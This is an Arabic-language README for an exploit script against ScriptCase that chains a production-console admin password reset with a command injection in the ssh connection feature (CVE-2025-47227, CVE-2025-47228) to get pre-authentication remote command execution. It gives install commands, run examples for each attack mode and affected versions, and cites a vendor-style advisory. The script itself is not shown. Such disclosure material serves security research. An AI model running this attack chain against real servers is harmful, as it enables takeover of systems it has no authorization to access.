
نص برمجي لاستغلال ثغرة تنفيذ الأوامر عن بُعد قبل المصادقة في ScriptCase (CVE-2025-47227, CVE-2025-47228).
يتم تحقيق تنفيذ الأوامر عن بُعد قبل المصادقة من خلال ربط ثغرتين: الأولى هي القدرة على إعادة تعيين كلمة مرور مسؤول وحدة الإنتاج (prod console) في ظل ظروف معينة، والثانية هي تنفيذ أوامر عن بُعد بسيط بعد المصادقة في ميزات الاتصال حيث يتم دمج مدخلات المستخدم مباشرةً في أمر نظام ssh.
يمكن تثبيت تبعيات بايثون الخارجية المستخدمة في الاستغلالات باستخدام أحد الأوامر التالية:
# pip - universal
pip3 install Pillow pytesseract requests beautifulsoup4
# pacman - Arch Linux
pacman -S python-pillow python-pytesseract python-requests python-beautifulsoup4
تمت كتابة سكربت استغلال للتعامل مع عدة سيناريوهات:
Usage:
Examples:
Pre-Auth RCE (password reset + RCE)
python exploit.py -u http://example.org/scriptcase -c "command"
Password reset only (no auth)
python exploit.py -u http://example.org/scriptcase
RCE only (need account)
python exploit.py -u http://example.org/scriptcase -c "command" -p 'Password123*'
Detect deployment path
python exploit.py -u http://example.org/ -d
Options:
-h, --help show this help message and exit
-u BASE_URL, --base-url=BASE_URL
-c COMMAND, --command=COMMAND
-p PASSWORD, --password=PASSWORD
-d, --detect
الإصدار 1.0.003-build-2 من وحدة بيئة الإنتاج متأثر. هذا الإصدار من الوحدة مضمن في ScriptCase الإصدار 9.12.006 (23). من المحتمل أن تكون الإصدارات السابقة عرضةً للخطر أيضًا.
https://www.synacktiv.com/advisories/scriptcase-pre-authenticated-remote-command-execution